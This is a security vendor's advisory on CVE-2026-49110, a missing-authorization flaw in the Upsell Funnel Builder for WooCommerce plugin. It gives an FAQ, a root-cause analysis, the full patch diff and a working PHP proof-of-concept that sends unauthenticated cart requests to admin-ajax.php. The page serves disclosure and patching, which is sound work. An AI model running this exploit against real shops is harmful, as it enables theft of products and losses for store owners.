How does the vulnerability work?

The vulnerability allows attackers to send POST requests to specific AJAX endpoints without proper authentication. By doing so, they can add products to the cart at arbitrary prices, which can lead to financial loss for the store.

Who is affected by this vulnerability?

Any WordPress site using the Upsell Funnel Builder for WooCommerce plugin version 3.1.4 or earlier is affected. Administrators should check their plugin versions to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Upsell Funnel Builder for WooCommerce plugin in your WordPress admin dashboard. If it is version 3.1.4 or earlier, your site is at risk.

How can I fix this vulnerability?

To mitigate the risk, update the Upsell Funnel Builder for WooCommerce plugin to version 3.1.5 or later, where the vulnerability has been patched. Regularly check for updates to ensure ongoing security.

What does the CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough to warrant prompt attention and remediation to prevent potential exploitation.

What are the practical risks of this vulnerability?

The practical risks include unauthorized manipulation of the WooCommerce cart, leading to financial loss through theft of products or unauthorized discounts. Attackers could also overload the cart with invalid products, causing denial of service.

What changes were made in the patch for this vulnerability?

The patch in version 3.1.5 includes proper nonce verification, checks to ensure products are purchasable, and validation of product IDs against allowed lists. It also sanitizes input values to prevent exploitation.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can exploit the vulnerability by crafting a POST request to the vulnerable AJAX endpoint. It illustrates how to supply product IDs and manipulate the cart without authentication.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin until it can be updated. Additionally, review your site’s security settings and monitor for any suspicious activity.

Are there any other security best practices to follow?

In addition to updating plugins, regularly audit all installed plugins for vulnerabilities, use strong passwords, implement two-factor authentication, and keep WordPress core and themes updated.

Where can I find more information about this vulnerability?

More information about CVE-2026-49110 can be found on the official CVE database, security advisories from the plugin developers, and security-focused websites that track vulnerabilities.

Published : June 14, 2026

CVE-2026-49110: Upsell Funnel Builder for WooCommerce – Create Upsells, Cross-Sells, Order Bumps, Frequently Bought, and Popups. <= 3.1.4 Missing Authorization PoC, Patch Analysis & Rule

Q: What is CVE-2026-49110?

CVE-2026-49110 is a medium severity vulnerability in the Upsell Funnel Builder for WooCommerce plugin, specifically versions up to and including 3.1.4. It involves missing authorization checks on AJAX handlers, allowing unauthenticated attackers to manipulate the WooCommerce cart.

CVE ID CVE-2026-49110

Plugin upsell-order-bump-offer-for-woocommerce

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 3.1.4

Patched Version 3.1.5

Disclosed June 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-49110:

This vulnerability affects the Upsell Funnel Builder for WooCommerce plugin (versions up to and including 3.1.4). It involves missing authorization checks in multiple AJAX handlers, allowing unauthenticated attackers to add products to a shopping cart at arbitrary prices. The CVSS score is 5.3 (medium severity).

The root cause is the complete absence of capability or permission checks on several public AJAX callback functions in the file `/public/class-upsell-order-bump-offer-for-woocommerce-public.php`. The vulnerable functions include `wps_add_to_cart_fbt_product_callback()` (around line 2687) and the recommendation offer handler (around line 2252). These functions process POST data and directly manipulate the WooCommerce cart without verifying that the requester is authenticated or authorized. Attackers can supply `wps_product_id`, `wps_product_price`, `wps_main_prod_id`, and other parameters without any validation that the product is actually configured for upsell offers.

To exploit CVE-2026-49110, an unauthenticated attacker sends a POST request to `/wp-admin/admin-ajax.php` with a specific `action` parameter that maps to one of the vulnerable callbacks. For example, the `wps_add_to_cart_fbt_product_callback` function is triggered by `action=wps_add_to_cart_fbt_product`. The attacker includes `wps_product_id[]` (an array of product IDs) and `wps_main_prod_id` (a main product ID) to add arbitrary products to the cart. The old code had a nonce check that used a self-generated nonce (`wp_create_nonce`) rather than verifying an incoming nonce, which made the check useless. No capability checks existed to restrict cart manipulation.

The patch in version 3.1.5 adds multiple security layers. It replaces the broken nonce verification with a proper `check_ajax_referer` call that validates a nonce sent from the client. It also validates that the requested product actually exists, is purchasable, and is listed in the configured `wps_recommendated_product_ids` metadata for the target product. The patch ensures prices are derived from the actual product price rather than a user-supplied value, uses `wc_format_decimal` to sanitize prices, and performs input validation (e.g., `absint` for IDs, `is_numeric` for discount values). Additionally, the patch removes an exposed hidden price input (`wps_cart_offer_product_price`) from HTML output and adds checks to verify the origin product is in the cart before adding recommendations.

Successful exploitation allows an unauthenticated attacker to manipulate the WooCommerce cart by adding arbitrary products at zero cost or heavily discounted prices. This directly impacts store revenue by enabling theft of products or unauthorized price reductions. The attacker can also potentially cause denial of service by adding excessive quantities or invalid products. While the attack does not lead to direct data exposure or privilege escalation (no admin access is gained), the financial impact on an e-commerce store can be significant.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/upsell-order-bump-offer-for-woocommerce/includes/class-upsell-order-bump-offer-for-woocommerce.php
+++ b/upsell-order-bump-offer-for-woocommerce/includes/class-upsell-order-bump-offer-for-woocommerce.php
@@ -78,7 +78,7 @@
 		if ( defined( 'UPSELL_ORDER_BUMP_OFFER_FOR_WOOCOMMERCE_VERSION' ) ) {
 			$this->version = UPSELL_ORDER_BUMP_OFFER_FOR_WOOCOMMERCE_VERSION;
 		} else {
-			$this->version = '3.1.4';
+			$this->version = '3.1.5';
 		}
 		$this->plugin_name = 'upsell-order-bump-offer-for-woocommerce';

--- a/upsell-order-bump-offer-for-woocommerce/public/class-upsell-order-bump-offer-for-woocommerce-public.php
+++ b/upsell-order-bump-offer-for-woocommerce/public/class-upsell-order-bump-offer-for-woocommerce-public.php
@@ -2252,10 +2252,29 @@
 		if ( isset( $_POST['wps_product_id'] ) ) {

 			$wps_product_id = isset( $_POST['wps_product_id'] ) ? absint( $_POST['wps_product_id'] ) : '';
-			$wps_product_price = isset( $_POST['wps_product_price'] ) ? absint( $_POST['wps_product_price'] ) : '';

 			$wps_target_product_id = isset( $_POST['wps_target_product_id'] ) ? absint( $_POST['wps_target_product_id'] ) : '';
 			$wps_target_var_product_id = isset( $_POST['wps_variation_product_id'] ) ? absint( $_POST['wps_variation_product_id'] ) : '';
+			$wps_recommended_product = wc_get_product( $wps_product_id );
+			if ( empty( $wps_recommended_product ) || ! $wps_recommended_product->is_purchasable() ) {
+				wp_send_json_error();
+			}
+
+			$wps_allowed_product_ids = array();
+			$wps_allowed_products    = get_post_meta( $wps_target_product_id, 'wps_recommendated_product_ids' );
+			foreach ( $wps_allowed_products as $wps_allowed_product ) {
+				if ( is_array( $wps_allowed_product ) ) {
+					$wps_allowed_product_ids = array_merge( $wps_allowed_product_ids, array_map( 'absint', $wps_allowed_product ) );
+				} else {
+					$wps_allowed_product_ids[] = absint( $wps_allowed_product );
+				}
+			}
+
+			if ( ! in_array( $wps_product_id, array_filter( $wps_allowed_product_ids ), true ) ) {
+				wp_send_json_error();
+			}
+
+			$wps_product_price = (float) $wps_recommended_product->get_price();

 			if ( ! empty( $wps_target_var_product_id ) ) {
 				$wps_select_option_discount = get_post_meta( $wps_target_var_product_id, 'wps_select_option_discount', true );
@@ -2269,19 +2288,29 @@
 			if ( 'no_disc' == $wps_select_option_discount ) {

 				// Add the product to the cart when no discount is set.
-				WC()->cart->add_to_cart( $wps_product_id, 1, 0, array(), array( 'wps_cart_offer_custom_price' => $wps_product_price ) );
+				WC()->cart->add_to_cart( $wps_product_id, 1, 0, array(), array( 'wps_cart_offer_custom_price' => wc_format_decimal( $wps_product_price ) ) );
 			} elseif ( 'wps_percent' == $wps_select_option_discount ) {

+				if ( ! is_numeric( $wps_recommendation_discount_val ) ) {
+					wp_send_json_error();
+				}
+
 				// Get the discounted price.
 				$discount_percentage = $wps_recommendation_discount_val / 100;
 				$custom_discounted_price = $wps_product_price * ( 1 - $discount_percentage );

 				// Add the product to the cart with Discounted Price.
-				WC()->cart->add_to_cart( $wps_product_id, 1, 0, array(), array( 'wps_cart_offer_custom_price' => $custom_discounted_price ) );
+				WC()->cart->add_to_cart( $wps_product_id, 1, 0, array(), array( 'wps_cart_offer_custom_price' => wc_format_decimal( max( 0, $custom_discounted_price ) ) ) );
 			} elseif ( 'wps_fixed' == $wps_select_option_discount ) {

+				if ( ! is_numeric( $wps_recommendation_discount_val ) ) {
+					wp_send_json_error();
+				}
+
 				// Add the product to the cart with Fixed Price.
-				WC()->cart->add_to_cart( $wps_product_id, 1, 0, array(), array( 'wps_cart_offer_custom_price' => $wps_recommendation_discount_val ) );
+				WC()->cart->add_to_cart( $wps_product_id, 1, 0, array(), array( 'wps_cart_offer_custom_price' => wc_format_decimal( max( 0, (float) $wps_recommendation_discount_val ) ) ) );
+			} else {
+				WC()->cart->add_to_cart( $wps_product_id, 1, 0, array(), array( 'wps_cart_offer_custom_price' => wc_format_decimal( $wps_product_price ) ) );
 			}
 			// Return a success response.
 			$data = array(
@@ -2306,10 +2335,10 @@
 	public function wps_add_custom_price_to_cart_item( $cart_object ) {
 		foreach ( $cart_object->get_cart() as $item ) {

-			if ( array_key_exists( 'wps_cart_offer_custom_price', $item ) ) {
+			if ( array_key_exists( 'wps_cart_offer_custom_price', $item ) && is_numeric( $item['wps_cart_offer_custom_price'] ) ) {
 				$item['data']->set_price( $item['wps_cart_offer_custom_price'] );
 			}
-			if ( array_key_exists( 'fbt_price', $item ) ) {
+			if ( array_key_exists( 'fbt_price', $item ) && is_numeric( $item['fbt_price'] ) ) {
 				$item['data']->set_price( $item['fbt_price'] );
 			}
 		}
@@ -2495,7 +2524,6 @@
 											$wps_html_discount_section .= '<input id="wps_cart_offer_quantity" type="hidden" value ="1">';
 											$wps_html_discount_section .= '<input id="wps_cart_offer_product_id_' . $value . '" type="hidden" value =' . $cart_item['product_id'] . '>';
 											$wps_html_discount_section .= '<input class ="wps_offered_product_id" type="hidden" value =' . $value . '>';
-											$wps_html_discount_section .= '<input id="wps_cart_offer_product_price_' . $value . '" type="hidden" value =' . $product->get_price() . '>';
 											$wps_html_discount_section .= '</div>';
 										}
 									}
@@ -2521,70 +2549,85 @@
 		 check_ajax_referer( 'wps_ubo_lite_nonce_recommend', 'nonce' );
 		$parent_product_id = isset( $_POST['parent_product_id'] ) ? absint( $_POST['parent_product_id'] ) : '';
 		$child_product_id = isset( $_POST['child_product_id'] ) ? absint( $_POST['child_product_id'] ) : '';
-		$wps_cart_offer_product_price = isset( $_POST['wps_cart_offer_product_price'] ) ? absint( $_POST['wps_cart_offer_product_price'] ) : '';
 		$wps_cart_offer_quantity_value = isset( $_POST['wps_cart_offer_quantity_value'] ) ? absint( $_POST['wps_cart_offer_quantity_value'] ) : '';
-		$wps_cart_offer_product_id_value = ! empty( $_POST['wps_cart_offer_product_id_value'] ) ? sanitize_text_field( wp_unslash( $_POST['wps_cart_offer_product_id_value'] ) ) : '';
+		$wps_cart_offer_product_id_value = ! empty( $_POST['wps_cart_offer_product_id_value'] ) ? absint( $_POST['wps_cart_offer_product_id_value'] ) : '';

 		$message = '';
-		$wps_discount_price = '';
+		$result = false;

 		$wps_offer_product_discount_type = get_post_meta( $wps_cart_offer_product_id_value, 'wps_select_option_discount' );
 		$wps_offer_product_discount_val = get_post_meta( $wps_cart_offer_product_id_value, 'wps_recommendation_discount_val' );

 		$product = wc_get_product( $parent_product_id );
+		if ( empty( $product ) || empty( $wps_cart_offer_product_id_value ) || empty( $wps_cart_offer_quantity_value ) ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'Invalid cart offer request.', 'upsell-order-bump-offer-for-woocommerce' ) ) );
+		}

-		if ( $product->is_type( 'variable' ) ) {
-			try {
-				if ( ! empty( $child_product_id ) ) {
-					// Get the variation object.
-					$variation_product = wc_get_product( $child_product_id );
-					// Get the price of the variation.
-					$variation_price = $variation_product->get_price();
-					$wps_discount_price = $this->wps_get_cart_offer_discount_value( $wps_offer_product_discount_type, $wps_offer_product_discount_val, $variation_price );
-					// Create an array of product data to add to the cart.
-					$cart_item_data = array(
-						'_price' => $wps_discount_price, // Set the discounted price.
-					);
-					// Add the product to the cart.
-					$result = WC()->cart->add_to_cart( $child_product_id, $wps_cart_offer_quantity_value, 0, array(), $cart_item_data );
-				}
+		$wps_allowed_product_ids = array();
+		$wps_allowed_products    = get_post_meta( $wps_cart_offer_product_id_value, 'wps_recommendated_product_ids' );
+		foreach ( $wps_allowed_products as $wps_allowed_product ) {
+			if ( is_array( $wps_allowed_product ) ) {
+				$wps_allowed_product_ids = array_merge( $wps_allowed_product_ids, array_map( 'absint', $wps_allowed_product ) );
+			} else {
+				$wps_allowed_product_ids[] = absint( $wps_allowed_product );
+			}
+		}
+		$wps_allowed_product_ids = array_filter( $wps_allowed_product_ids );
+		if ( ! in_array( $parent_product_id, $wps_allowed_product_ids, true ) ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'Invalid cart offer product.', 'upsell-order-bump-offer-for-woocommerce' ) ) );
+		}

-				if ( $result ) {
-					// Product added to the cart successfully.
-					$message = 'remove';
-					wc_add_notice( 'Cart Offer Successfully Added To cart.', 'success' );
-				} else {
-					// Product could not be added to the cart (e.g., if it's out of stock).
-					$message = 'Product could not be added to the cart.';
-					wc_add_notice( 'Cart Offer Unable  To  Add To cart.', 'error' );
-				}
-			} catch ( Exception $e ) {
-				wc_add_notice( 'Unexpected error occurred.', 'error' );
+		$wps_origin_product_in_cart = false;
+		foreach ( WC()->cart->get_cart() as $cart_item ) {
+			if ( isset( $cart_item['product_id'] ) && absint( $cart_item['product_id'] ) === $wps_cart_offer_product_id_value ) {
+				$wps_origin_product_in_cart = true;
+				break;
 			}
-		} else {
+		}

-			try {
-				if ( ! empty( $parent_product_id ) ) {
-					$wps_discount_price = $this->wps_get_cart_offer_discount_value( $wps_offer_product_discount_type, $wps_offer_product_discount_val, $wps_cart_offer_product_price );
-					$cart_item_data = array(
-						'_price' => $wps_discount_price, // Set the discounted price.
-					);
+		if ( ! $wps_origin_product_in_cart ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'Cart offer is not available for this cart.', 'upsell-order-bump-offer-for-woocommerce' ) ) );
+		}

-					$result = WC()->cart->add_to_cart( $parent_product_id, $wps_cart_offer_quantity_value, 0, array(), $cart_item_data );
+		try {
+			if ( $product->is_type( 'variable' ) ) {
+				if ( empty( $child_product_id ) ) {
+					wp_send_json_error( array( 'message' => esc_html__( 'Invalid cart offer variation.', 'upsell-order-bump-offer-for-woocommerce' ) ) );
 				}

-				if ( $result ) {
-					// Product added to the cart successfully.
-					$message = 'remove';
-					wc_add_notice( 'Cart Offer Successfully Added To cart.', 'success' );
-				} else {
-					// Product could not be added to the cart (e.g., if it's out of stock).
-					$message = 'Product could not be added to the cart.';
-					wc_add_notice( 'Cart Offer Unable  To  Add To cart.', 'error' );
+				$variation_product = wc_get_product( $child_product_id );
+				if ( empty( $variation_product ) || absint( $variation_product->get_parent_id() ) !== $parent_product_id || ! $variation_product->is_purchasable() ) {
+					wp_send_json_error( array( 'message' => esc_html__( 'Invalid cart offer variation.', 'upsell-order-bump-offer-for-woocommerce' ) ) );
 				}
-			} catch ( Exception $e ) {
-				wc_add_notice( 'Unexpected error occurred.', 'error' );
-			}
+
+				$wps_base_price = (float) $variation_product->get_price();
+				$wps_discount_price = $this->wps_get_cart_offer_discount_value( $wps_offer_product_discount_type, $wps_offer_product_discount_val, $wps_base_price );
+				$cart_item_data = array(
+					'_price' => wc_format_decimal( $wps_discount_price ), // Set the discounted price.
+				);
+
+				$result = WC()->cart->add_to_cart( $parent_product_id, $wps_cart_offer_quantity_value, $child_product_id, array(), $cart_item_data );
+			} elseif ( $product->is_purchasable() ) {
+				$wps_base_price = (float) $product->get_price();
+				$wps_discount_price = $this->wps_get_cart_offer_discount_value( $wps_offer_product_discount_type, $wps_offer_product_discount_val, $wps_base_price );
+				$cart_item_data = array(
+					'_price' => wc_format_decimal( $wps_discount_price ), // Set the discounted price.
+				);
+
+				$result = WC()->cart->add_to_cart( $parent_product_id, $wps_cart_offer_quantity_value, 0, array(), $cart_item_data );
+			}
+		} catch ( Exception $e ) {
+			wc_add_notice( 'Unexpected error occurred.', 'error' );
+		}
+
+		if ( $result ) {
+			// Product added to the cart successfully.
+			$message = 'remove';
+			wc_add_notice( 'Cart Offer Successfully Added To cart.', 'success' );
+		} else {
+			// Product could not be added to the cart (e.g., if it's out of stock).
+			$message = 'Product could not be added to the cart.';
+			wc_add_notice( 'Cart Offer Unable  To  Add To cart.', 'error' );
 		}

 		$response = array(
@@ -2592,8 +2635,7 @@
 			'message' => $message,
 		);

-		echo wp_json_encode( $response );
-		wp_die();
+		wp_send_json( $response );
 	}

 	/**
@@ -2606,7 +2648,12 @@
 	 */
 	public function wps_get_cart_offer_discount_value( $wps_offer_product_discount_type, $wps_offer_product_discount_val, $wps_cart_offer_product_price ) {

+		$wps_discounted_price = (float) $wps_cart_offer_product_price;
 		if ( is_array( $wps_offer_product_discount_type ) && ! empty( $wps_offer_product_discount_type ) && is_array( $wps_offer_product_discount_val ) && ! empty( $wps_offer_product_discount_val ) ) {
+			if ( ! is_numeric( $wps_offer_product_discount_val[0] ) && 'no_disc' !== $wps_offer_product_discount_type[0] ) {
+				return $wps_discounted_price;
+			}
+
 			if ( 'wps_percent' == $wps_offer_product_discount_type[0] ) {   // For the Percentaged count.
 				// Get the product's regular price.
 				$regular_price = floatval( $wps_cart_offer_product_price );
@@ -2623,7 +2670,7 @@
 			}
 		}

-		return $wps_discounted_price;
+		return max( 0, (float) $wps_discounted_price );
 	}

 	/**
@@ -2636,7 +2683,7 @@

 		foreach ( $cart_object->get_cart() as $item ) {

-			if ( array_key_exists( '_price', $item ) ) {
+			if ( array_key_exists( '_price', $item ) && is_numeric( $item['_price'] ) ) {
 				$item['data']->set_price( $item['_price'] );
 			}
 		}
@@ -2687,26 +2734,65 @@
 	 * @since    1.0.0
 	 */
 	public function wps_add_to_cart_fbt_product_callback() {
-		$secure_nonce      = wp_create_nonce( 'wps-upsell-auth-nonce' );
-		$id_nonce_verified = wp_verify_nonce( $secure_nonce, 'wps-upsell-auth-nonce' );
-		if ( ! $id_nonce_verified ) {
-			wp_die( esc_html__( 'Nonce Not verified', 'upsell-order-bump-offer-for-woocommerce' ) );
+		check_ajax_referer( 'wps_ubo_lite_nonce_recommend', 'nonce' );
+
+		if ( ! function_exists( 'WC' ) || empty( WC()->cart ) ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'Cart is unavailable.', 'upsell-order-bump-offer-for-woocommerce' ) ) );
 		}
-		$wps_product_id = isset( $_POST['wps_product_id'] ) ? array_map( 'sanitize_text_field', wp_unslash( $_POST['wps_product_id'] ) ) : array();
+
+		$wps_product_id = isset( $_POST['wps_product_id'] ) ? array_map( 'absint', wp_unslash( $_POST['wps_product_id'] ) ) : array();
 		$wps_main_product_id = isset( $_POST['wps_main_prod_id'] ) ? absint( $_POST['wps_main_prod_id'] ) : '';
+
+		$wps_main_product = wc_get_product( $wps_main_product_id );
+		if ( empty( $wps_main_product ) || empty( $wps_product_id ) ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'Invalid frequently bought together request.', 'upsell-order-bump-offer-for-woocommerce' ) ) );
+		}
+
+		$wps_allowed_product_ids = array();
+		$wps_allowed_products    = get_post_meta( $wps_main_product_id, 'wps_recommendated_product_ids' );
+		foreach ( $wps_allowed_products as $wps_allowed_product ) {
+			if ( is_array( $wps_allowed_product ) ) {
+				$wps_allowed_product_ids = array_merge( $wps_allowed_product_ids, array_map( 'absint', $wps_allowed_product ) );
+			} else {
+				$wps_allowed_product_ids[] = absint( $wps_allowed_product );
+			}
+		}
+		$wps_allowed_product_ids = array_filter( $wps_allowed_product_ids );
+		if ( empty( $wps_allowed_product_ids ) ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'No frequently bought together products are configured.', 'upsell-order-bump-offer-for-woocommerce' ) ) );
+		}
+
+		$wps_added_product = false;
+
 		// Loop through each product and add it to the cart.
-		foreach ( $wps_product_id as $product_id ) {
+		foreach ( array_unique( $wps_product_id ) as $product_id ) {
+			if ( ! in_array( $product_id, $wps_allowed_product_ids, true ) ) {
+				continue;
+			}
+
 			$product = wc_get_product( $product_id );
-			$price = $product->get_price();
-			$discount = $this->wps_custom_discount_price( $price, $wps_main_product_id, $wps_method_upsell = 'yes' );
+			if ( empty( $product ) || ! $product->is_purchasable() ) {
+				continue;
+			}
+
+			$price = (float) $product->get_price();
+			$discount = $this->wps_custom_discount_price( $price, $wps_main_product_id, 'yes' );
+			if ( ! is_numeric( $discount ) ) {
+				$discount = $price;
+			}
+
 			// Add the product to the cart.
-			WC()->cart->add_to_cart( $product_id, 1, 0, array(), array( 'fbt_price' => $discount ) );
+			$wps_added_product = WC()->cart->add_to_cart( $product_id, 1, 0, array(), array( 'fbt_price' => wc_format_decimal( $discount ) ) ) || $wps_added_product;
+		}
+
+		if ( ! $wps_added_product ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'No valid frequently bought together products were added.', 'upsell-order-bump-offer-for-woocommerce' ) ) );
 		}
+
 		$data = array(
 			'wps_product_added'  => 'yes',
 		);
-		echo wp_json_encode( $data );
-		wp_die();
+		wp_send_json( $data );
 	}


@@ -2726,6 +2812,10 @@
 		$wps_recommendation_discount_val = get_post_meta( $wps_target_product_id, 'wps_fbt_discount_val', true );

 		$wps_discounted_price = '';
+		if ( ! is_numeric( $wps_recommendation_discount_val ) && 'no_disc' !== $wps_select_option_discount ) {
+			return (float) $wps_product_price;
+		}
+
 		if ( 'no_disc' == $wps_select_option_discount ) {

 			$wps_discounted_price = $wps_product_price;
@@ -2744,7 +2834,11 @@
 				$wps_discounted_price = 0;
 			}
 		}
-		return $wps_discounted_price;
+		if ( ! is_numeric( $wps_discounted_price ) ) {
+			$wps_discounted_price = $wps_product_price;
+		}
+
+		return max( 0, (float) $wps_discounted_price );
 	}


--- a/upsell-order-bump-offer-for-woocommerce/upsell-order-bump-offer-for-woocommerce.php
+++ b/upsell-order-bump-offer-for-woocommerce/upsell-order-bump-offer-for-woocommerce.php
@@ -17,12 +17,12 @@
  * Description:       <code><strong>Upsell Funnel Builder for WooCommerce</strong></code>helps merchants maximize sales and generate revenue by curating one-click upsell and bump offers!. <a target="_blank" href="https://wpswings.com/woocommerce-plugins/?utm_source=wpswings-orderbump-shop&utm_medium=orderbump-pro-backend&utm_campaign=shop-page" >Elevate your eCommerce store by exploring more on <strong>WP Swings</strong></a>.
  *
  * Requires at least:       6.7.0
- * Tested up to:            6.9.4
+ * Tested up to:            7.0
  * WC requires at least:    6.5.0
- * WC tested up to:         10.7.0
+ * WC tested up to:         10.8.1
  *
  * Requires Plugins: woocommerce
- * Version:           3.1.4
+ * Version:           3.1.5
  * Author:            WP Swings
  * Author URI:        https://wpswings.com/?utm_source=wpswings-official&utm_medium=order-bump-org-backend&utm_campaign=official
  * License:           GPL-3.0
@@ -145,7 +145,7 @@
 	/**
 	 * Currently plugin version.
 	 */
-	define( 'UPSELL_ORDER_BUMP_OFFER_FOR_WOOCOMMERCE_VERSION', '3.1.4' );
+	define( 'UPSELL_ORDER_BUMP_OFFER_FOR_WOOCOMMERCE_VERSION', '3.1.5' );
 	if ( ! defined( 'WPS_WOCUF_URL_FUNNEL_BUILDER' ) ) {
 		define( 'WPS_WOCUF_URL_FUNNEL_BUILDER', plugin_dir_url( __FILE__ ) );
 	}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-49110 - Missing Authorization in Upsell Funnel Builder for WooCommerce

// Configurable target URL
$target_url = 'http://example.com'; // Change this to the target WordPress site

// Endpoint and action for the vulnerable function
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$action = 'wps_add_to_cart_fbt_product'; // Maps to wps_add_to_cart_fbt_product_callback()

// Attacker-supplied product IDs (must be valid product IDs on the target)
$product_ids = array(123, 456); // Replace with actual product IDs
$main_product_id = 789; // Replace with a main product ID (can be any valid product)

// Build POST data
$post_data = array(
    'action'           => $action,
    'wps_product_id'   => $product_ids,
    'wps_main_prod_id' => $main_product_id,
);

// Execute the request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Status: $http_coden";
echo "Response: $responsen";

echo "n--- Explanation ---n";
echo "This PoC sends a request to the vulnerable AJAX handler that lacks authorization checks.n";
echo "On a vulnerable version (<=3.1.4), the products will be added to the cart without validation.n";
echo "The nonce check is broken (self-generated nonce) and no permission checks exist.n";
echo "Users should verify that products are added by checking the WooCommerce cart after running this script.n";

Frequently Asked Questions

What is CVE-2026-49110?
Overview of the vulnerability
CVE-2026-49110 is a medium severity vulnerability in the Upsell Funnel Builder for WooCommerce plugin, specifically versions up to and including 3.1.4. It involves missing authorization checks on AJAX handlers, allowing unauthenticated attackers to manipulate the WooCommerce cart.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send POST requests to specific AJAX endpoints without proper authentication. By doing so, they can add products to the cart at arbitrary prices, which can lead to financial loss for the store.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Upsell Funnel Builder for WooCommerce plugin version 3.1.4 or earlier is affected. Administrators should check their plugin versions to determine if they need to take action.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Upsell Funnel Builder for WooCommerce plugin in your WordPress admin dashboard. If it is version 3.1.4 or earlier, your site is at risk.
How can I fix this vulnerability?
Updating the plugin
To mitigate the risk, update the Upsell Funnel Builder for WooCommerce plugin to version 3.1.5 or later, where the vulnerability has been patched. Regularly check for updates to ensure ongoing security.
What does the CVSS score of 5.3 mean?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough to warrant prompt attention and remediation to prevent potential exploitation.
What are the practical risks of this vulnerability?
Potential impacts on e-commerce
The practical risks include unauthorized manipulation of the WooCommerce cart, leading to financial loss through theft of products or unauthorized discounts. Attackers could also overload the cart with invalid products, causing denial of service.
What changes were made in the patch for this vulnerability?
Details of the security update
The patch in version 3.1.5 includes proper nonce verification, checks to ensure products are purchasable, and validation of product IDs against allowed lists. It also sanitizes input values to prevent exploitation.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept shows how an attacker can exploit the vulnerability by crafting a POST request to the vulnerable AJAX endpoint. It illustrates how to supply product IDs and manipulate the cart without authentication.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the plugin until it can be updated. Additionally, review your site’s security settings and monitor for any suspicious activity.
Are there any other security best practices to follow?
Enhancing overall security
In addition to updating plugins, regularly audit all installed plugins for vulnerabilities, use strong passwords, implement two-factor authentication, and keep WordPress core and themes updated.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-49110 can be found on the official CVE database, security advisories from the plugin developers, and security-focused websites that track vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations